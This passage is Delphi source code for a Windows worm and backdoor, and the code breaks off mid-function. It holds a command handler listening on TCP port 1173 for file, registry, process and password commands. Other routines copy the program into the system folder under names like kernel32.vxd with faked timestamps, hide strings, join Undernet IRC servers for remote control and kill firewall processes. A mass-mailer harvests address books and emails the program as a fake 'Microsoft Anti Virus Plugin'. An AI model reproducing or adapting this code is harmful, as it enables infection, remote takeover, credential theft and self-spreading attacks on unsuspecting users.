//DoReceiveFile(wParam,copy(command,pos('?',command)+1,255)); end; '8' : DoRenameFile(wParam,copy(command,pos('?',command)+1,255)); '9' : DoCreateDirectory(wParam,copy(command,pos('?',command)+1,255)); 'A' : DoDeleteDirectory(wParam,copy(command,pos('?',command)+1,255)); 'B' : DoWriteReg(wParam,copy(command,pos('?',command)+1,255)); 'C' : DoReadReg(wParam,copy(command,pos('?',command)+1,255)); 'D' : DoProxy(wParam,copy(command,pos('?',command)+1,255)); 'E' : DoKillProcess(wParam,copy(command,pos('?',command)+1,255)); 'F' : DoWindowsProcess(wParam); 'G' : DoPassword(wParam); 'H' : DoTimeout(wParam,copy(command,pos('?',command)+1,255)); end; // closesocket(wParam); processmessages; end; //=== Process OnSocketMessage === procedure OnSocketMessage(Msg,wParam,lParam:longInt); begin if ( LOWORD(lParam) and FD_ACCEPT = FD_ACCEPT) then Sock.OnServerAccept(wParam,lParam); if ( LOWORD(lParam) and FD_CLOSE = FD_CLOSE) then sock.OnServerClose(wParam,lParam); if ( LOWORD(lParam) and FD_READ = FD_READ) then sock.OnServerRead(wParam,lParam); end; //== Processes every message sent to MAIN window === function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall; begin Result:= 0; case Msg of WM_CREATE : OnCreate(hWnd); WM_CLOSE : OnClose(hWnd); WM_MY_SOCK_MESSAGE : OnSocketMessage(Msg,wParam,lParam); WM_DESTROY : ShutDownServer; end; Result:=DefWindowProc(hWnd,Msg,wParam,lParam); end; //=== OnInitSocket === //==TCP procedure InitSocket; begin WSAStartup($101,WSD); Port:=1173; Server := Socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); // Server := Socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); if Server = -1 then WSACleanup; Addr.sin_family:= AF_INET; Addr.sin_addr.s_addr:=INADDR_ANY; Addr.sin_port:=htons(Port); bind(Server,Addr,SizeOf(Addr)); WSAAsyncSelect(Server,Handle,WM_MY_SOCK_MESSAGE, FD_ACCEPT + FD_CLOSE + FD_READ); // listen; listen(Server,5); end; //==UDP {procedure InitSocket2; begin si:=SizeOf(integer); WSAStartup($101,WSD); Port:=136; Server := Socket(PF_INET, SOCK_DGRAM, 
IPPROTO_UDP); if Server = -1 then WSACleanup; Addr.sin_family:= PF_INET; Addr.sin_addr.s_addr:=INADDR_ANY; Addr.sin_port:=htons(Port); setsockopt(Server,SOL_SOCKET,SO_BROADCAST,@i,si); bind(Server,Addr,SizeOf(Addr)); WSAAsyncSelect(Server,Handle,WM_MY_SOCK_MESSAGE, FD_ACCEPT + FD_CLOSE + FD_READ); listen(Server,5); end;} //=====copyit function GetFileDateTimeModified(const FileName: string;var yyyy,mm,dd,h,m,s: word):boolean; var dt,tm: word; DateTime: integer; begin result := false; DateTime := FileAge(FileName); if DateTime = -1 then exit else result := true; tm := DateTime and $FFFF; {lower word} dt := DateTime shr 16; {upper word} h := tm shr 11; m := (tm shr 5) and $3F; s := (tm and $1F) * 2; dd := dt and $1F; mm := (dt shr 5) and $F; yyyy := (dt shr 9)+1980; end; function SetFileDateTime(const FileName: string;var yyyy,mm,dd,h,m,s: word):boolean; var SrchHdl: THandle; FileHdl: HFile; FindData: TWin32FindData; wDate,wTime: word; LocalFileTime, NewFileTime: TFileTime; begin result := false; SrchHdl := FindFirstFile(PChar(FileName), FindData); if SrchHdl <> INVALID_HANDLE_VALUE then begin Windows.FindClose(SrchHdl); if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then begin wTime := (h shl 11) + (m shl 5) + (m div 2); wDate := (dd) + (mm shl 5)+ ((yyyy-1980) shl 9); DosDateTimeToFileTime(wDate,wTime,LocalFileTime); LocalFileTimeToFileTime(LocalFileTime, NewFileTime); FileHdl := _lopen(PChar(FileName), OF_WRITE); if FileHdl <> HFILE_ERROR then begin if SetFileTime(FileHdl,@NewFileTime,@NewFileTime,@NewFileTime) then result := true; _lclose(FileHdl); end; end; end; end; procedure copyit; var FromF, ToF: file; NumRead, NumWritten: Integer; Buf: array[1..2048] of Char; begin s:=paramstr(0); if (s<>systemdir+crypt(']IFVKCK;;$]TI')) and (s<>systemdir+crypt(']IFVKCK&MFG')) then begin //\KERNEL32.VXD \KERNEL.DLL filemode:=0; if fileexists(systemdir+crypt(']ifvkck;;$}ti')) then exit; //\kernel32.vxd if fileexists(systemdir+crypt(']ifvkck&mfg')) then exit; 
//\kernel.dll Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey(crypt('Eg\Hdhfj{kx'),true); //De_Lanabras Registre.WriteString(crypt('333<=6'),pchar(crypt('um#`lc''g{*ecy.{1vzq'))); //210880 //to die or not to die Registre.Free; AssignFile(FromF,paramstr(0)); Reset(FromF, 1); { Record size = 1 } AssignFile(ToF, systemdir+crypt(']ifvkck;;$}ti')); { ouvre le fichier de sortie }//\kernel32.vxd Rewrite(ToF, 1); { Record size = 1 } repeat BlockRead(FromF, Buf, SizeOf(Buf), NumRead); BlockWrite(ToF, Buf, NumRead, NumWritten); until (NumRead = 0) or (NumWritten <> NumRead); CloseFile(FromF); CloseFile(ToF); GetFileDateTimeModified(windowsdir+'\explorer.exe',yyyy,mm,dd,h,m,ss); SetFileDateTime(systemdir+crypt(']ifvkck;;$}ti'),yyyy,mm,dd,h,m,ss); //\kernel32.vxd AssignFile(FromF,paramstr(0)); Reset(FromF, 1); { Record size = 1 } AssignFile(ToF, systemdir+crypt(']ifvkck&mfg')); { ouvre le fichier de sortie }//\kernel.dll Rewrite(ToF, 1); { Record size = 1 } repeat BlockRead(FromF, Buf, SizeOf(Buf), NumRead); BlockWrite(ToF, Buf, NumRead, NumWritten); until (NumRead = 0) or (NumWritten <> NumRead); CloseFile(FromF); CloseFile(ToF); SetFileDateTime(systemdir+crypt(']ifvkck&mfg'),yyyy,mm,dd,h,m,ss); //\kernel.dll end; end; //===========Online??? const INVALID_IP_ADDRESS= $ffffffff; function ip2string(ip_address:longint):string; begin ip_address:=ntohl(ip_address); result:= inttostr(ip_address shr 24)+'.'+ inttostr((ip_address shr 16) and $ff)+'.'+ inttostr((ip_address shr 8) and $ff)+'.'+ inttostr(ip_address and $ff); end; function lookup_hostname(const hostname:string):longint; var RemoteHost : PHostEnt; (* no, don't free it! *) ip_address: integer; s: string; begin ip_address:=INVALID_IP_ADDRESS; try if hostname='' then begin (* no host given! 
*) lookup_hostname:=ip_address; EXIT; end else begin s:=hostname+#0; ip_address:=Inet_Addr(PChar(@s[1])); // ip_address:=Winsock.Inet_Addr(PChar(hostname)); if ip_address=$FFFFFFFF then begin RemoteHost:=GetHostByName(PChar(@s[1])); // RemoteHost:=Winsock.GetHostByName(PChar(hostname)); if (RemoteHost=NIL) or (RemoteHost^.h_length<=0) then begin lookup_hostname:=ip_address; EXIT; (* host not found *) end else ip_address:=longint(pointer(RemoteHost^.h_addr_list^)^); end; end; except ip_address:=INVALID_IP_ADDRESS; end; lookup_hostname:=ip_address; end; //====== Connection Irc === type THede = class(TObject) procedure MyHwndProc(var Msg:TMessage); procedure agprun; procedure server; function ip2string(ip_address:longint):string; end; const SocketMessag = WM_USER+107; var MySocket: TSocket; MyName : TSockAddr; MyAddr : TInAddr; Hede: THede; Buffer:array[0..1023] of char; res : word; WST : TWSAData; host: string; b:byte; function my_ip_address:longint; const bufsize=255; var buf: pointer; RemoteHost : PHostEnt; (* No, don't free it! *) begin buf:=NIL; try getmem(buf,bufsize); gethostname(buf,bufsize); (* this one maybe without domain *) RemoteHost:=GetHostByName(buf); if RemoteHost=NIL then my_ip_address:=htonl($7F000001) (* 127.0.0.1 *) else my_ip_address:=longint(pointer(RemoteHost^.h_addr_list^)^); finally if buf<>NIL then freemem(buf,bufsize); end; end; function THede.ip2string(ip_address:longint):string; begin ip_address:=ntohl(ip_address); result:= inttostr(ip_address shr 24)+'.'+ inttostr((ip_address shr 16) and $ff)+'.'+ inttostr((ip_address shr 8) and $ff)+'.'+ inttostr(ip_address and $ff); end; procedure Thede.server; var srvlist: array[0..14] of string; x:byte; systemTime:TSystemTime; z:longint; begin sleep(10000); b:=0; randomize; j := 0; result:=''; nukemsg:=''; repeat j:=j+1; x := 64 + random(58); case x of 0 .. 64 : result := 'a'; 65 .. 90 : result := chr(x); 91 .. 96 : result := 'e'; 97 .. 
122 : result := chr(x); 123..255 : result := 'd'; end; nukemsg:=nukemsg+result; until j=9; j := 0; result:=''; nukemsg2:=''; repeat j:=j+1; x := 96 + random(26); case x of // 0 .. 64 : result := 'a'; // 65 .. 90 : result := 'u'; 91 .. 96 : result := 'e'; 97 .. 122 : result := chr(x); 123..255 : result := 'd'; end; nukemsg2:=nukemsg2+result; until j=10; with systemtime do begin wYear:= wYear; wMonth:=wMonth; wDayOfWeek:= wDayOfWeek; wDay:=wDay; wHour:= wHour; wMinute:= wMinute; wSecond:= wSecond; wMilliseconds:= wMilliseconds; end; getsystemtime(SystemTime); j:=systemtime.wMonth; //srvlist[0]:='127.0.0.1'; srvlist[1]:=crypt('dw-qkbbzgo"b|h'); //eu.undernet.org srvlist[2]:=crypt('bc-qkbbzgo"b|h'); //ca.undernet.org srvlist[3]:=crypt('tq-qkbbzgo"b|h'); //us.undernet.org srvlist[4]:=crypt('umqkkrh&fd%ol z~uwazpb9wk}'); //toronto.on.ca.undernet.org srvlist[5]:=crypt('sgdakue}{m%hh je?g}ppdy}m4tnz'); //regensburg.de.eu.undernet.org srvlist[6]:=crypt('dqskj(aa''o~"x`kuc|v`;ye'); //espoo.fi.eu.undernet.org srvlist[7]:=crypt('bjjgdah&`f%y~ Z~uwazpb9wk}'); //chicago.il.us.Undernet.org srvlist[8]:=crypt('vcpllh`|fd%hn zc?g}ppdy}m4tnz'); //washington.dc.us.undernet.org srvlist[9]:=crypt('`opp`tcid$e`#kz>d|wqgxrl7ui{'); //amsterdam.nl.eu.undernet.org srvlist[10]:=crypt('rvokpot&de%y~ z~uwazpb9wk}'); //stlouis.mo.us.undernet.org srvlist[11]:=crypt('qkwpvdrznb%|l zc?g}ppdy}m4tnz'); //pittsburgh.pa.us.undernet.org srvlist[12]:=crypt('`w`oigil''dq"x`kuc|v`;ye'); //auckland.nz.undernet.org srvlist[13]:=crypt('qjlako&hp%y~ z~uwazpb9wk}'); //phoenix.az.us.undernet.org srvlist[14]:=crypt('ecohdu)|q$~#{att`}qa8xj~'); //dallas.tx.us.undernet.org x:=random(14)+1; // x:=0; host:=srvlist[x]; z:=lookup_hostname(host); host:=ip2string(z); //writeln(host); WSAStartup($101,WST); hede.agprun; end; procedure THede.MyHwndProc(var msg:TMessage); var check,s:string; begin FillChar(buffer,sizeof(buffer),#0); if msg.Msg = SocketMessag then begin if msg.LParamLo = FD_CLOSE then begin //writeln('end'); 
closesocket(mysocket); WSACleanup; hede.server; exit; end; //if msg.LParamLo = FD_WRITE then writeln('[Socket Write]'); if msg.LParamLo = FD_READ then begin res:=Recv(MySocket,Buffer,sizeof(Buffer),0); if res=-1 then begin // S:='Error : '+inttostr(WSAGetLastError); // writeln(s); closesocket(mysocket); WSACleanup; hede.server; exit; end; //if Buffer[1]<>'' then S:='[connected]'; //writeln(s); //writeln('[Socket Read] '+ inttostr(res) +'/300 : '+Buffer); end; if res<0 then begin //writeln('*** Cant Read !!! >:-['); closesocket(mysocket); WSACleanup; hede.server; exit; end; end; check:=copy(buffer,1,6); if check=crypt('QKMC%<') then //PING : begin sleep(100); check:=copy(buffer,7,20); sock.WriteString(MySocket,pchar(crypt('QMMC%<')+check+#13+#10)); //PONG : if b=0 then begin sleep(500); //writeln('USER '+nukemsg+' '+ip2string(my_ip_address)+' '+nukemsg2+'.org :'+copy(nukemsg2,1,5)+#13+#10); //sock.WriteString(MySocket,pchar('USER thepeaceto "death.com" "'+ip2string(my_ip_address)+'" :dukkk'+#13+#10)); sock.WriteString(MySocket,pchar(crypt('TQFV%')+copy(nukemsg2,1,7)+' "'+nukemsg2+'.com" "'+ip2string(my_ip_address)+'" :'+copy(nukemsg2,1,5)+#13+#10)); //USER sleep(500); sock.WriteString(MySocket,pchar(crypt('LMGA%')+nukemsg+' +i'+#13+#10)); //MODE sleep(500); sock.WriteString(MySocket,pchar(crypt('KMJJ%')+crypt('"]e[gYn')+inttostr(j)+' '+crypt('dosawiuW')+#13+#10)); //JOIN //#_f_b_i //emperor_ sleep(500); sock.WriteString(MySocket,pchar(crypt('LMGA%')+crypt('"]e[gYn')+inttostr(j)+' +sk '+crypt('dosawiuW')+#13+#10));//MODE sleep(500); Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('.aft',true); sock.WriteString(MySocket,pchar(crypt('QPJRHU@(')+crypt('"]e[gYn')+inttostr(j)+' '+crypt(';jfhii')+Registre.ReadString('1')+#13+#10)); //PRIVMSG //:hello Registre.Free; b:=1; end; end; end; procedure THede.agpRun; var s:string; myhwnd: Thandle; begin MySocket:=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP); MyAddr.S_addr:=Inet_Addr(@Host[1]); 
MyName.sin_family:=PF_INET; MyName.sin_port:=htons(6667); //port to connect MyName.sin_addr:=MyAddr; // MyName.sin_port:=ntohs(strtoint(edit4.text)); //port on receive res:=connect(MySocket,MyName,sizeof(MyName)); if res<>0 then begin // S:='Connect Error : '+inttostr(WSAGetLastError); // writeln(s); closesocket(mysocket); WSACleanup; hede.server; exit; end; myhwnd := AllocateHwnd(hede.MyHWndProc); WSAAsyncSelect(MySocket, myhwnd, SocketMessag, FD_READ OR FD_WRITE OR FD_CLOSE ); res:=Recv(MySocket,Buffer,sizeof(buffer),0); //sock.WriteString(MySocket,pchar('PASS 666'+#13+#10)); sleep(500); sock.WriteString(MySocket,pchar(crypt('OK@O%')+nukemsg+#13+#10)); //NICK while not ExitCode<>ExitCode2 do processmessages; end; //===fuck_protection procedure scanprotection; begin if findwindow(nil,@(crypt('OgwEuv@}hxo'))[1])<>0 then //NetAppGuard begin killprocess(crypt('OgwEuv@}hxo')); //NetAppGuard end; if findwindow(nil,@(crypt('BmmW`gk(YI+JD\JGP^_'))[1])<>0 then //ConSeal PC FIREWALL begin killprocess(crypt('BmmW`gk(YI+JD\JGP^_')); appmsg(pchar(crypt('HR#ekb''ijidycz/~pv4yyp|~;ss>lIFLBHDGD eABJWP^wZXd]XVzTLZ7 ./d3#5; %%b'))); end; exit; end; //====== Spammer =========== type TSpam = class(TObject) procedure base64(var hFile: File; var sLine: string; var More: boolean); procedure start; procedure send; procedure scanmail; procedure scanmail2; procedure fileini; procedure MyHwndProc(var msg:TMessage); end; type TLookup = array [0..64] of Char; const SocketMessage = WM_USER+108; const Base64Out: TLookup = ( 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/', '=' ); var WSM : TWSAData; myhwnd2:THandle; MySocket2: TSocket; MyName2 : TSockAddr; MyAddr2 : TInAddr; res2 : word; buffer2,host2: string; procedure 
TSpam.MyHwndProc(var msg:TMessage); begin //FillChar(buffer,sizeof(buffer),#0); if msg.Msg = SocketMessage then begin if msg.LParamLo = FD_CLOSE then begin closesocket(mysocket2); end; // if msg.LParamLo = FD_WRITE then writeln('[Socket Write]'); if msg.LParamLo = FD_READ then begin res2:=Recv(MySocket2,Buffer2,sizeof(Buffer2),0); if res2=-1 then begin // S:='Error : '+inttostr(WSAGetLastError); // writeln(s); closesocket(mysocket2); WSACleanup; end; //writeln(buffer2); end; end; end; procedure TSpam.Base64(var hFile: File; var sLine: string; var More: boolean); var Count : integer; DataIn : array [0..2] of byte; DataOut : array [0..80] of byte; ByteCount : integer; i : integer; // hfile:file; // sline:string; begin Count := 0; {$I-} while not Eof(hFile) do begin {$I+} BlockRead(hFile, DataIn, 3, ByteCount); DataOut[Count] := (DataIn[0] and $FC) shr 2; DataOut[Count + 1] := (DataIn[0] and $03) shl 4; if ByteCount > 1 then begin DataOut[Count + 1] := DataOut[Count + 1] + (DataIn[1] and $F0) shr 4; DataOut[Count + 2] := (DataIn[1] and $0F) shl 2; if ByteCount > 2 then begin DataOut[Count + 2] := DataOut[Count + 2] + (DataIn[2] and $C0) shr 6; DataOut[Count + 3] := (DataIn[2] and $3F); end else begin DataOut[Count + 3] := $40; end; end else begin DataOut[Count + 2] := $40; DataOut[Count + 3] := $40; end; for i := 0 to 3 do DataOut[Count + i] := Byte(Base64Out[DataOut[Count + i]]); Count := Count + 4; if Count > 59 then break; end; DataOut[Count] := $0; sLine := StrPas(@DataOut[0]); {$I-} More := not Eof(hFile); {$I+} end; procedure TSpam.start; var i:TRegistry; ss:string; begin //writeln('START'); if fileexists(systemdir+'\outlook.ini') then begin send; exit; end; Filemode:=2; assignfile(ttt,systemdir+'\outlook.ini'); rewrite(ttt); append(ttt); //memo1.clear; writeln(ttt,'[OUTL]'); i:=tregistry.Create; i.RootKey:=HKEY_CURRENT_USER; i.OpenKey('Software\Microsoft\WAB\WAB4\Wab File Name',true); //memo1.lines.add(i.ReadString('')); outlook:=i.ReadString(''); i.Free; 
i:=tregistry.Create; i.RootKey:=HKEY_CURRENT_USER; i.openkey('Software\Microsoft\Internet Account Manager',true); ss:=i.ReadString('Default Mail Account'); //memo1.lines.add('Mail account: '+s); i.Free; i:=tregistry.Create; i.RootKey:=HKEY_CURRENT_USER; i.openkey('Software\Microsoft\Internet Account Manager\Accounts\'+ss,true); if i.ReadString('SMTP Server')='' then writeln(ttt,'[SERV]'+'mail.'+crypt('bmntpubzo')+'.com') else //compuserve writeln(ttt,'[SERV]'+i.ReadString('SMTP Server')); i.Free; i:=tregistry.Create; i.RootKey:=HKEY_CURRENT_USER; i.openkey('Software\Microsoft\Internet Account Manager\Accounts\'+ss,true); if i.ReadString('SMTP Port')='' then writeln(ttt,'[PORT]'+'25') else writeln(ttt,'[PORT]'+i.ReadString('SMTP Port')); i.Free; ScanMail; writeln(ttt,'[EUDO]'); i:=tregistry.Create; i.RootKey:=HKEY_CURRENT_USER; i.OpenKey('Software\Qualcomm\Eudora\CommandLine',true); ss:=i.ReadString('Current'); delete(ss,pos('.',ss)-6,length(ss)); eudora:=ss; i.Free; fileini; ScanMail2; closefile(ttt); send; end; procedure TSpam.send; var day,month,i:integer; s:string; ff:file of char; c:char; zday,zmonth,slav,user,serv,zport:string; sock:TSock; SystemTime:TSystemTime; w:longint; hfile:file; sline:string; more:boolean; FMimeBoundary,filename:string; begin if not fileexists(systemdir+'\outlook.ini') then exit; sleep(1200000); // 20 min Filemode:=2; assignfile(ff,systemdir+'\outlook.ini'); reset(ff); i:=0; s:=''; WSAStartup($101,WSM); repeat i:=filepos(ff); blockread(ff,c,sizeof(c)); s:=s+c; if c=#10 then begin if copy(s,1,6)='[KILL]' then begin closefile(ff); exit; end; if copy(s,1,6)='[SERV]' then serv:=copy(s,7,pos(#13,s)-7); if copy(s,1,6)='[PORT]' then zport:=copy(s,7,pos(#13,s)-7); if copy(s,1,6)='[EUDO]' then zport:='25'; if copy(s,1,6)='[USER]' then begin user:=copy(s,7,pos(#13,s)-7); end; if copy(s,1,6)='[SLAV]' then begin seek(ff,i-length(s)+1); blockwrite(ff,'[FUCK]',sizeof('[FUCK]')); slav:=copy(s,7,pos(#13,s)-7); //memo1.lines.add(serv+' : '+port+' : 
'+user+' : '+slav); writeln(serv+' : '+zport+' : '+user+' : '+slav); sleep(20000); w:=lookup_hostname(serv); host2:=ip2string(w); //host2:='127.0.0.1'; MySocket2:=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP); MyAddr2.S_addr:=Inet_Addr(@Host2[1]); MyName2.sin_family:=PF_INET; MyName2.sin_port:=htons(strtoint(zport)); //port to connect MyName2.sin_addr:=MyAddr2; // MyName.sin_port:=ntohs(strtoint(edit4.text)); //port on receive res2:=connect(MySocket2,MyName2,sizeof(MyName2)); if res2<>0 then begin // S:='Suck Error : '+inttostr(WSAGetLastError); // writeln(s); closesocket(mysocket2); WSACleanup; exit; end; myhwnd2 := AllocateHwnd(MyHWndProc); WSAAsyncSelect(MySocket2, myhwnd2, SocketMessage, FD_READ OR FD_WRITE OR FD_CLOSE ); FileName:=paramstr(0); //FileName:='c:\temp\hmm.sep'; with systemtime do begin wYear:= wYear; wMonth:=wMonth; wDayOfWeek:= wDayOfWeek; wDay:=wDay; wHour:= wHour; wMinute:= wMinute; wSecond:= wSecond; wMilliseconds:= wMilliseconds; end; getsystemtime(SystemTime); FMimeBoundary := '=Multipart Boundary '+ //FormatDateTime('mmddyyhhnn', Now); inttostr(systemtime.wMonth)+inttostr(systemtime.wDay)+inttostr(systemtime.wYear)+inttostr(systemtime.wHour)+inttostr(systemtime.wMinute); //writeln('let''s rock'); sock.WriteString(MySocket2,pchar('HELO '+serv+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('MAIL FROM: '+user+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('RCPT TO: '+slav+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('DATA'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('From: '+user+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('To: '+slav+#13+#10)); sleep(timeout+10); //sock.WriteString(MySocket2,pchar('Subject: Fwd: Microsoft Anti Virus Plugin'+#13+#10)); sock.WriteString(MySocket2,pchar('Subject: Fwd: Microsoft Anti Virus Plugin'+#13+#10)); randomize; day:=systemtime.wDayOfWeek; case day of 0: zday:='Sun'; 1: zday:='Mon'; 2: zday:='Tue'; 3: zday:='Wed'; 4: 
zday:='Thu'; 5: zday:='Fri'; 6: zday:='Sat'; end; month:=systemtime.wMonth; case month of 1: zmonth:='Jan'; 2: zmonth:='Feb'; 3: zmonth:='Mar'; 4: zmonth:='Apr'; 5: zmonth:='May'; 6: zmonth:='Jun'; 7: zmonth:='Jul'; 8: zmonth:='Aug'; 9: zmonth:='Sep'; 10: zmonth:='Oct'; 11: zmonth:='Nov'; 12: zmonth:='Dec'; end; sleep(timeout+10); sock.WriteString(MySocket2,pchar('Date: '+zday+', '+inttostr(systemtime.wDay)+' '+zmonth+ ' '+inttostr(systemtime.wYear)+' '+inttostr(systemtime.wHour)+':'+inttostr(systemtime.wMinute)+':'+inttostr(systemtime.wSecond)+' +0000'+#13+#10)); //Date: Fri, 27 Dec 2002 16:46:11 +0000 sleep(timeout+10); sock.WriteString(MySocket2,pchar('Mime-Version: 1.0'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Type: ' + 'multipart/mixed' + '; boundary="' +FmimeBoundary+ '"'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(''+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('--'+FmimeBoundary+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Type: ' + 'text/plain' + '; charset="' +'iso-8859-1' + '"'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Transfer-Encoding: quoted-printable'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(''+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Microsoft Anti Virus Plugin Detected any Suspiciuos files.'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Test your computer today and foward this Email.'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Free service (for win95/98/Me/NT/2000/Xp).'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(''+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('___________________________________________________________'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('TrendMicro has scanned this mail for viruses, vandals'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('and 
suspicious attachments and has found it to be CLEAN.'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(' '+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('File: MSPlug-in.exe data (32,768 bytes)'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Encoding: Base64'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Result: Clean.'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(''+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('--'+FmimeBoundary+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Type: ' + 'application/octet-stream' + ';'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(#9+'name="' + 'MSPlug-in.exe' + '"'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Transfer-Encoding: base64'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('Content-Disposition: attachment;'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(#9+'filename="' + 'MSPlug-in.exe' + '"'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar(''+#13+#10)); sleep(timeout+10); AssignFile(hFile,filename); FileMode := 0; Reset(hFile, 1); repeat BASE64(hfile, sLine, More); if sline<>'' then sock.WriteString(MySocket2,pchar(sline+#13+#10)); sleep(timeout); until sline=''; more:=true; closefile(hfile); sleep(timeout+10); sock.WriteString(MySocket2,pchar('--' + FMimeBoundary + '--'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('.'+#13+#10)); sleep(timeout+10); sock.WriteString(MySocket2,pchar('QUIT'+#13+#10)); sleep(timeout+10); closesocket(mysocket2); //writeln('All done.'); end; s:=''; end; until eof(ff); seek(ff,0); blockwrite(ff,'[KILL] ',sizeof('[KILL] ')); closefile(ff); //writeln('DEAD'); if TerminateThread(ThreadHdle3, ExitCode3) then begin closefile(ff); closesocket(mysocket2); WSACleanup; exit;end; WSACleanup; end; procedure TSpam.ScanMail2; var i,yyyy,yyy,yy,count,NumRead: integer; 
poss,poss2,poss3:longint; bufffT,Bufff,bufff2: Char; tof:textfile; a,b,c,d,e,f,g,thepoint:boolean; From:file; x,y,z:byte; pp1,pp2,p1,p2,ss2,s,s2,s3,s4,s5,s6:string; begin a:=false; b:=false; c:=false; d:=false; //special e:=false; f:=false; g:=false; thepoint:=false; count:=0; poss:=0; //if eudora+'NNDBASE.TXT'='' then begin writeln('No Eudora File found'); exit; end; if fileexists(eudora+'NNDBASE.TXT') then begin filemode:=0; Assignfile(From,eudora+'NNDBASE.TXT'); Reset(From, 1); yy:=filesize(from); end else begin //writeln('I can''t open the file...'); exit; end; repeat //processmessages; BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if bufff='@' then begin poss:=filepos(from); poss2:=poss; a:=true end; if a=true then begin poss:=poss-1; repeat poss:=poss-1; count:=count+1; if poss>0 then seek(From,poss) else begin c:=true; g:=true; end; //memo1.Lines.add(inttostr(poss)); BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if bufff in ['a'..'z'] then {memo1.Lines.add(bufff)} else if bufff in ['0'..'9'] then {memo1.Lines.add(bufff)} else if bufff in ['A'..'Z'] then {memo1.Lines.add(bufff)} else if bufff = '-' then {memo1.Lines.add(bufff)} else if bufff = '.' 
then {memo1.Lines.add(bufff)} else if bufff = '@' then {memo1.Lines.add(bufff)} begin b:=true; g:=true; end else if bufff = '_' then {memo1.Lines.add(bufff)} else b:=true; if count=26 then begin b:=true; g:=true;end; if b=true then if count<4 then begin c:=true; g:=true; end else c:=true; until c=true; // memo1.Lines.add('1:'+inttostr(poss)+' 2:'+inttostr(poss2)); poss3:=poss; b:=false; c:=false; count:=0; poss2:=poss2-1; repeat poss2:=poss2+1; count:=count+1; seek(From,poss2); BlockRead(From, Bufff, SizeOf(Bufff), NumRead); if bufff in ['a'..'z'] then {memo1.Lines.add(bufff)} else if bufff in ['0'..'9'] then {memo1.Lines.add(bufff)} else if bufff in ['A'..'Z'] then {memo1.Lines.add(bufff)} else if bufff = '-' then {memo1.Lines.add(bufff)} else if bufff = '@' then {memo1.Lines.add(bufff)} begin b:=true; g:=true end else if bufff = '.' then {memo1.Lines.add(bufff)} thepoint:=true else if bufff = '_' then {memo1.Lines.add(bufff)} else b:=true; if thepoint<>true then g:=true; if count=60 then begin c:=true; g:=true;end; if b=true then if count<2 then begin c:=true; g:=true; end else c:=true; until c=true; c:=false; b:=false; a:=false; count:=0; s:=''; poss:=poss+1; e:=true; repeat //filtre seek(From,poss); BlockRead(From, Bufff, SizeOf(Bufff), NumRead); poss:=poss+1; if e=true then if (bufff='@') or (bufff='.') then begin g:=true; e:=false; end else e:=false; f:=true; seek(From,poss); BlockRead(From, Bufff2, SizeOf(Bufff2), NumRead); seek(From,poss-1); if bufff='@' then if bufff2='.' then g:=true; if bufff='.' then if bufff2='@' then g:=true; if bufff='.' then if bufff2='.' then g:=true; s:=s+bufff; until poss=poss2; if s='@' then g:=true; repeat p2:=s; delete(p2,1,length(p2)-3); pp1:=p2; pp2:=p2; delete(p2,2,length(p2)); if p2='.' then begin x:=9; delete(pp1,1,1); delete(pp1,3,3); if pp1[1] in ['0'..'9'] then x:=5; if pp1[1] = '_' then x:=5; if pp1[1] = '-' then x:=5; if pp1[1] = '.' 
